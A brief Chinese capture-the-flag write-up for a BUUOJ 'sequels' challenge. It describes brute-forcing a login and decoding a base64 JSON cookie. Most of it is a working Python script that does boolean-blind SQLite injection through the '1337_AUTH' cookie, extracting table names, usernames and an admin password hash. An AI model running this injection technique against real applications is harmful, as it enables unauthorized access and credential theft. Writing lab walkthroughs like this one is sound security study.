sqlite注入
登录baopo爆破一下得到用户名 guest guest
然后纠结了一会儿,在cookie中发现了
eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9
这样的文字,解密
{“username”:”guest”,”password”:”guest”}
猜测cookie处注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | import requests import base64 import string flag = "" url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels' for i in range(50): for j in string.printable: tmp = flag + j ''' #表名 if j == 'n': continue if j == 'r': continue if j == 's': continue payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%') # table_name notes,reviews,sqlite,uSeRiNfo ''' ''' #username if j == 'g': continue payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%') #username guest,sequeladmin ''' #password payload = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%') #password f5ec3af19f0d3679e7d5a148f4ac323d payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8') r = requests.get(url, cookies={"1337_AUTH" : payload}) if "Movie" in r.text: flag = tmp print(flag) break |
登录就是flag
对于表来说
CREATE TABLE sqlite_master (
type TEXT, //table
name TEXT, //表名
tbl_name TEXT, //表名
rootpage INTEGER, //不清楚
sql TEXT //建表语句
);